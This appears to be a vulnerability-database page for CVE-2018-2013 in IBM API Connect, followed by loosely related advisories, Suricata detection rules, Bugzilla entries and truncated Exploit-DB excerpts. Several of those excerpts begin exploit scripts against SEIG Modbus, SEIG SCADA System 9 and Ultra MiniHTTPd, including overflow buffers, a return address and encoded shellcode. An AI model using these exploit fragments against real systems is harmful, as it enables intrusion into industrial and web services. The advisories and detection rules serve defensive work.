CVE-2018-2013
published 2019-06-25CVE-2018-2013: IBM API Connect 2018.1 through 2018.4.1.5 could disclose sensitive information to an unauthorized user that could aid in further attacks against the system…
PriorityP427medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
EPSS
1.76%
75.3th percentile
IBM API Connect 2018.1 through 2018.4.1.5 could disclose sensitive information to an unauthorized user that could aid in further attacks against the system. IBM X-Force ID: 155193.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | httpd | — | — |
| ibm | api_connect | — | — |
| ibm | api_connect | — | — |
| ibm | api_connect | 2018.1.0 – 2018.4.1.5 | — |
| msrc | microsoft_office_online_server_2016 | — | — |
| msrc | microsoft_office_web_apps_server_2013_service_pack_1 | — | — |
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv3.05.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_apache9.8LOW
vendor_redhat6.9MEDIUM
vendor_msrc5.4HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-34rg-qhv9-9cpx: IBM API Connect 2018
ghsa_unreviewed·2022-05-24
CVE-2018-2013 [MEDIUM] CWE-200 GHSA-34rg-qhv9-9cpx: IBM API Connect 2018
IBM API Connect 2018.1 through 2018.4.1.5 could disclose sensitive information to an unauthorized user that could aid in further attacks against the system. IBM X-Force ID: 155193.
GHSA
Improper Access Control in Telerik Extensions
ghsa·2022-05-13
CVE-2018-17060 [MEDIUM] CWE-284 Improper Access Control in Telerik Extensions
Improper Access Control in Telerik Extensions
Telerik Extensions for ASP.NET MVC (all versions) does not whitelist requests, which can allow a remote attacker to access files inside the server's web directory. NOTE: this product has been obsolete since June 2013.
Kernel
Merge git://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next
kernel_security·2018-09-25·CVSS 7.1
CVE-2013-4348 [HIGH] Merge git://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next
Merge git://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next
Daniel Borkmann says:
pull-request: bpf-next 2018-09-25
The following pull-request contains BPF updates for your *net-next* tree.
The main changes are:
1) Allow for RX stack hardening by implementing the kernel's flow
dissector in BPF. Idea was originally presented at netconf 2017 [0].
Quote from merge commit:
[...] Because of the rigorous checks of the BPF verifier, this
provides significant security guarantees. In particular, the BPF
flow dissector cannot get inside of an infinite loop, as with
CVE-2013-4348, because BPF programs are guaranteed to terminate.
It cannot read outside of packet bounds, because all memory accesses
are checked. Also, with BPF the administrator can decide which
protocols to support, reducing
Red Hat
kernel: Information Disclosure in crypto_report_one in crypto/crypto_user.c
vendor_redhat·2018-11-03·CVSS 2.1
CVE-2018-19854 [LOW] CWE-200 kernel: Information Disclosure in crypto_report_one in crypto/crypto_user.c
kernel: Information Disclosure in crypto_report_one in crypto/crypto_user.c
An issue was discovered in the Linux kernel before 4.19.3. crypto_report_one() and related functions in crypto/crypto_user.c (the crypto user configuration API) do not fully initialize structures that are copied to userspace, potentially leaking sensitive memory to user programs. NOTE: this is a CVE-2013-2547 regression but with easier exploitability because the attacker does not need a capability (however, the system must have the CONFIG_CRYPTO_USER kconfig option).
An issue was discovered in the Linux kernel in the crypto_report_one() and related functions in the crypto/crypto_user.c (the crypto user configuration API) which do not fully initialize structures that are copied to userspace, potentially leaking se
Microsoft
Microsoft Office Elevation of Privilege Vulnerability
vendor_msrc·2018-06-12·CVSS 5.4
CVE-2018-8247 [MEDIUM] Microsoft Office Elevation of Privilege Vulnerability
Microsoft Office Elevation of Privilege Vulnerability
Description: An elevation of privilege vulnerability exists when Office Web Apps Server 2013 and Office Online Server fail to properly handle web requests. An attacker who successfully exploited this vulnerability could perform script/content injection attacks and attempt to trick the user into disclosing sensitive information.
To exploit the vulnerability, an attacker could send an email message containing a malicious link to a user. Alternatively, an attacker could use a chat client to social engineer a user into clicking the malicious link. The user must click the malicious link for the vulnerability to be exploited.
The security update addresses the vulnerability by correcting how Office Web Apps Server 2013 and Office Online Serve
Red Hat
kernel: denial of service via ioctl call in network tun handling
vendor_redhat·2018-01-17·CVSS 6.9
CVE-2018-7191 [MEDIUM] CWE-400 kernel: denial of service via ioctl call in network tun handling
kernel: denial of service via ioctl call in network tun handling
In the tun subsystem in the Linux kernel before 4.13.14, dev_get_valid_name is not called before register_netdevice. This allows local users to cause a denial of service (NULL pointer dereference and panic) via an ioctl(TUNSETIFF) call with a dev name containing a / character. This is similar to CVE-2013-4343.
A flaw was found in the Linux kernel's implementation of networking tunnel device ioctl. A local attacker can cause a denial of service (NULL pointer dereference and panic) via an ioctl (TUNSETIFF) call with a dev name containing a / character.
Package: kernel (Red Hat Enterprise Linux 5) - Out of support scope
Package: kernel (Red Hat Enterprise Linux 6) - Will not fix
Package: kernel-alt (Red Hat Enterprise Linux
Red Hat
Mozilla: Script execution in HTML mail replies (MFSA 2014-14)
vendor_redhat·2014-02-06·CVSS 4.3
CVE-2013-6674 [MEDIUM] Mozilla: Script execution in HTML mail replies (MFSA 2014-14)
Mozilla: Script execution in HTML mail replies (MFSA 2014-14)
Cross-site scripting (XSS) vulnerability in Mozilla Thunderbird 17.x through 17.0.8, Thunderbird ESR 17.x through 17.0.10, and SeaMonkey before 2.20 allows user-assisted remote attackers to inject arbitrary web script or HTML via an e-mail message containing a data: URL in an IFRAME element, a related issue to CVE-2014-2018.
Statement: This issue was resolved in the version of thunderbird as shipped with Red Hat Enterprise Linux 5 and 6 via RHSA-2013:1823.
Package: firefox (Red Hat Enterprise Linux 5) - Not affected
Package: firefox (Red Hat Enterprise Linux 6) - Not affected
Red Hat
Mozilla: Script execution in HTML mail replies (MFSA 2014-14)
vendor_redhat·2014-02-06·CVSS 4.3
CVE-2014-2018 [MEDIUM] Mozilla: Script execution in HTML mail replies (MFSA 2014-14)
Mozilla: Script execution in HTML mail replies (MFSA 2014-14)
Cross-site scripting (XSS) vulnerability in Mozilla Thunderbird 17.x through 17.0.8, Thunderbird ESR 17.x through 17.0.10, and SeaMonkey before 2.20 allows user-assisted remote attackers to inject arbitrary web script or HTML via an e-mail message containing a data: URL in a (1) OBJECT or (2) EMBED element, a related issue to CVE-2013-6674.
Statement: This issue was resolved in the version of thunderbird as shipped with Red Hat Enterprise Linux 5 and 6 via RHSA-2013:1823.
Package: firefox (Red Hat Enterprise Linux 5) - Not affected
Package: thunderbird (Red Hat Enterprise Linux 5) - Affected
Package: firefox (Red Hat Enterprise Linux 6) - Not affected
Package: thunderbird (Red Hat Enterprise Linux 6) - Affected
Apache
Apache httpd: CVE-2018-1312
vendor_apache·CVSS 9.8
CVE-2018-1312 [LOW] Apache httpd: CVE-2018-1312
Apache httpd: CVE-2018-1312
When generating an HTTP Digest authentication challenge, the nonce sent to prevent reply attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common Digest authentication configuration, HTTP requests could be replayed across servers by an attacker without detection. Acknowledgements: The issue was discovered by Nicolas Daniels. Reported to security team 2013-03-05 Issue public 2018-03-21 Update 2.4.33 released 2018-03-21 Affects 2.4.29, 2.4.28, 2.4.27, 2.4.26, 2.4.25, 2.4.23, 2.4.20, 2.4.18, 2.4.17, 2.4.16, 2.4.12, 2.4.10, 2.4.9, 2.4.7, 2.4.6, 2.4.4, 2.4.3, 2.4.2, 2.4.1
Severity: low
Suricata
ET SCADA SEIG Modbus 3.4 - Remote Code Execution
suricata·2018-08-21
CVE-2013-0662 ET SCADA SEIG Modbus 3.4 - Remote Code Execution
ET SCADA SEIG Modbus 3.4 - Remote Code Execution
Rule: alert tcp any any -> $HOME_NET 27700 (msg:"ET SCADA SEIG Modbus 3.4 - Remote Code Execution"; flow:established,to_server; content:"|42 42 ff ff 07 03 44 00 64|"; fast_pattern; content:"|90 90 90 90 90 90 90 90 90 90|"; distance:0; reference:url,exploit-db.com/exploits/45220/; reference:cve,2013-0662; classtype:attempted-user; sid:2026005; rev:1; metadata:created_at 2018_08_21, cve CVE_2013_0662, confidence High, signature_severity Major, updated_at 2019_07_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET SCADA SEIG SYSTEM 9 - Remote Code Execution
suricata·2018-08-21
CVE-2013-0657 ET SCADA SEIG SYSTEM 9 - Remote Code Execution
ET SCADA SEIG SYSTEM 9 - Remote Code Execution
Rule: alert tcp any any -> $HOME_NET 12397 (msg:"ET SCADA SEIG SYSTEM 9 - Remote Code Execution"; flow:established,to_server; content:"|14 60 00 00 66 66 07 00 10 00 00 00 19 00 00 00 00 00 04 00 00 00 60 00|"; depth:24; content:!"|0d|"; distance:0; content:!"|0a|"; distance:0; content:!"|ff|"; content:!"|00|"; distance:0; reference:url,exploit-db.com/exploits/45218/; reference:cve,2013-0657; classtype:attempted-user; sid:2026003; rev:1; metadata:created_at 2018_08_21, cve CVE_2013_0657, confidence High, signature_severity Major, updated_at 2019_07_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Exploit-DB
Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting
exploitdb·2020-01-29
Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting
Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting
---
# Exploit Title: Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting
# Date: 2020-01-29
# Exploit Author: LiquidWorm
# Vendor: Fifthplay NV
# Vendor Homepage: https://www.fifthplay.com
# Version: 2019.2_HP
# Tested on: Linux
# CVE : -
Fifthplay S.A.M.I - Service And Management Interface Unauthenticated Stored XSS
Vendor: Fifthplay NV
Product web page: https://www.fifthplay.com
Affected version: Platform: HAM V1.2
HAM V1.1
HAM V1.0
DINHAM 10W
Image Version: 2019.3-20190605144803
2019.2_HP-20190808154634
2018.4_HP-20181015152950
2018.2-20180516100815
2017.2_HP-20180213083050
2013.4_HP-201309301203
AMP Version: 2019.2_HP
2018.4_HP
2017.2_HP
2013.4_HP
R20.19.03
R20.18.02
Fix: 2017.2-HP4
2018.4_HP3
2018.5_HP7
2019.
Exploit-DB
ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)
exploitdb·2018-11-14·CVSS 7.5
CVE-2018-7182 [HIGH] ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)
ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)
---
# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)
# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/blog/cve-2018-7182
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz
# Version: ntp 4.2.8p6 - 4.2.8p10
# CVE: CVE-2018-7182
# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind
#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf
#==50079== Memcheck, a memory error detector
#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
#==50079== Using Valgrind-3.10.0 an
Exploit-DB
WebVet 0.1a - 'id' SQL Injection
exploitdb·2018-11-05
WebVet 0.1a - 'id' SQL Injection
WebVet 0.1a - 'id' SQL Injection
---
# Exploit Title: WebVet 0.1a - 'id' SQL Injection
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://webvet.exreality.net/
# Software Link: https://netix.dl.sourceforge.net/project/webvet/webvet_2013_07_08.zip
# Version: 0.1a
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# /[PATH]/client.php
#091 else if (!empty($_POST['form_search_client']))
#092 {
#093 $searchedClient = new Client();
#094 if (!empty($_POST['id']))
#095 $searchedClient->id = $_POST['id'];
#096 if (!empty($_POST['lastname']))
#097 $searchedClient->lastname = $_POST['lastname'];
#098 if (!empty($_POST['patient']))
#099 $searchedClient->patient = $_POST['patient'];
#100
#101 // do the search
#102 $db_connection = db_open(db_user
Exploit-DB
SEIG Modbus 3.4 - Denial of Service (PoC)
exploitdb·2018-08-20·CVSS 9.3
CVE-2013-0662 [CRITICAL] SEIG Modbus 3.4 - Denial of Service (PoC)
SEIG Modbus 3.4 - Denial of Service (PoC)
---
# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows7 x86
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
import socket
import struct
import time
ip = "192.168.127.137"
port = 27700
con = (ip, port)
header_padding = "\x00\xAA"
header_buffer_size = "\xFF\xFF"
header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
header_end = "\xFF"
header = header_padding + header_buffer_size
Exploit-DB
SEIG Modbus 3.4 - Remote Code Execution
exploitdb·2018-08-20·CVSS 9.3
CVE-2013-0662 [CRITICAL] SEIG Modbus 3.4 - Remote Code Execution
SEIG Modbus 3.4 - Remote Code Execution
---
# Title: SEIG Modbus 3.4 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows XP SP3
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
import socket
import struct
ip = "192.168.127.138"
port = 27700
con = (ip, port)
####### MESSAGE ##########
message_header = "\x00\x64"
message_buffer = "A" * 0x5dc
eip = struct.pack("H", len(message))
header_end = "\x44"
header = header_padding + header_buf_size + header_recv_len + header_end
####################
Exploit-DB
SEIG SCADA System 9 - Remote Code Execution
exploitdb·2018-08-19·CVSS 10.0
CVE-2013-0657 [CRITICAL] SEIG SCADA System 9 - Remote Code Execution
SEIG SCADA System 9 - Remote Code Execution
---
# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
# Version: v9
# Tested on: Windows7 x86
# CVE: CVE-2013-0657
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657
import socket
import struct
ip = "192.168.0.23"
port = 12397
con = (ip, port)
# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)
# length = "\x00\x70\x00\x00\x00\x00\x00\x00"
# message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644
# payload = length+message
# Exploit Magic
message
Exploit-DB
Schneider Electric PLCs - Cross-Site Request Forgery
exploitdb·2018-05-21·CVSS 6.8
CVE-2013-0663 [MEDIUM] Schneider Electric PLCs - Cross-Site Request Forgery
Schneider Electric PLCs - Cross-Site Request Forgery
---
# Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery
# Date: 2018-05-12
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Tested on: Windows
# CVE: CVE-2013-0663
# Version: Schneider Electric Quantum PLC: 140NOE77111, 140NOE77101, 140NWM10000
# Modicon M340 PLC: BMXNOC0401, BMXNOE0100x, BMXNOE011xx
# Premium PLC: TSXETY4103, TSXETY5103, and TSXWMY100
# Category: webapps
CSRF POC
Name:
&
Pass:
Verify Pass:
'); break;
}
//-->
Exploit-DB
Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)
exploitdb·2018-04-17·CVSS 10.0
CVE-2013-5019 [CRITICAL] Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)
Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)
---
# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow
# Date: 2018-04-14
# Exploit Author: jollymongrel
# Vendor Homepage: http://www.vector.co.jp
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.2
# Tested on: Windows 7 32-bit
# CVE : CVE-2013-5019
import sys
import socket
import struct
eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]
#windows/exec - 274 bytes
#http://www.metasploit.com
#Encoder: x86/shikata_ga_nai
#EXITFUNC=thread
#CMD=calc.exe
#badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'
shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"
"\x25\xbd\x4c\x
Bugzilla
CVE-2018-0498 CVE-2018-0497 mbedtls: Two critical flaws fixed in latest release
bugzilla·2018-08-02·CVSS 2.6
CVE-2018-0498 [LOW] CVE-2018-0498 CVE-2018-0497 mbedtls: Two critical flaws fixed in latest release
CVE-2018-0498 CVE-2018-0497 mbedtls: Two critical flaws fixed in latest release
CVE-2018-0497
ARM mbed TLS before 2.12.0, before 2.7.5, and before 2.1.14 allows remote
attackers to achieve partial plaintext recovery (for a CBC based ciphersuite)
via a timing-based side-channel attack. This vulnerability exists because of an
incorrect fix (with a wrong SHA-384 calculation) for CVE-2013-0169.
CVE-2018-0498
ARM mbed TLS before 2.12.0, before 2.7.5, and before 2.1.14 allows local users
to achieve partial plaintext recovery (for a CBC based ciphersuite) via a
cache-based side-channel attack.
References:
https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security-advisory-2018-02
Bugzilla
CVE-2018-10843 source-to-image: Builder images with assembler-user LABEL set to root allows attackers to execute arbitrary code
bugzilla·2018-05-17·CVSS 8.5
CVE-2018-10843 [HIGH] CVE-2018-10843 source-to-image: Builder images with assembler-user LABEL set to root allows attackers to execute arbitrary code
CVE-2018-10843 source-to-image: Builder images with assembler-user LABEL set to root allows attackers to execute arbitrary code
OpenShift Container Platform and OpenShift Online have a flaw in the source-to-image functionality. An attacker that can create images with the 'io.openshift.s2i.assemble-user' LABEL set to 'root' can execute arbitrary code with full privileges in the builder pod during S2I build.
Discussion:
Acknowledgments:
Name: Jeremy Choi (Red Hat)
---
This issue has been addressed in the following products:
Red Hat OpenShift Container Platform 3.9
Via RHSA-2018:2013 https://access.redhat.com/errata/RHSA-2018:2013
---
RHSCL release was packaged before io.openshift.s2i.assemble-user functionality was added to source-to-image.
Bugzilla
CVE-2018-1070 Routing: Malicous Service configuration can bring down routing for an entire shard.
bugzilla·2018-03-08·CVSS 6.5
CVE-2018-1070 [MEDIUM] CVE-2018-1070 Routing: Malicous Service configuration can bring down routing for an entire shard.
CVE-2018-1070 Routing: Malicous Service configuration can bring down routing for an entire shard.
Improper input validation of the Openshift Routing configuration can cause an entire shard to be brought down. A malicious user can use this vulnerability to cause a Denial of Service attack for other users of the router shard.
Discussion:
Acknowledgments:
Name: Mark Chappell (Red Hat)
---
This issue affects Openshift Enterprise 3.7.1, and possibly other versions.
---
This issue has been addressed in the following products:
Red Hat OpenShift Container Platform 3.9
Via RHSA-2018:2013 https://access.redhat.com/errata/RHSA-2018:2013
Bugzilla
CVE-2013-4317 cloudstack: Information disclosure in listProjectAccounts in the CloudStack API
bugzilla·2018-02-20·CVSS 4.3
CVE-2013-4317 [MEDIUM] CVE-2013-4317 cloudstack: Information disclosure in listProjectAccounts in the CloudStack API
CVE-2013-4317 cloudstack: Information disclosure in listProjectAccounts in the CloudStack API
A vulnerability was found in Apache CloudStack 4.1.0 and 4.1.1, when calling the CloudStack API call listProjectAccounts as a regular, non-administrative user, the user is able to see information for accounts other than their own.
References:
http://seclists.org/oss-sec/2018/q1/1
Discussion:
JBoss Fuse does not use apache cloudstack and it's not affected by this flaw.
http://www.securityfocus.com/bid/108907https://exchange.xforce.ibmcloud.com/vulnerabilities/155193https://www.ibm.com/support/docview.wss?uid=ibm10882924http://www.securityfocus.com/bid/108907https://exchange.xforce.ibmcloud.com/vulnerabilities/155193https://www.ibm.com/support/docview.wss?uid=ibm10882924
2019-06-25
Published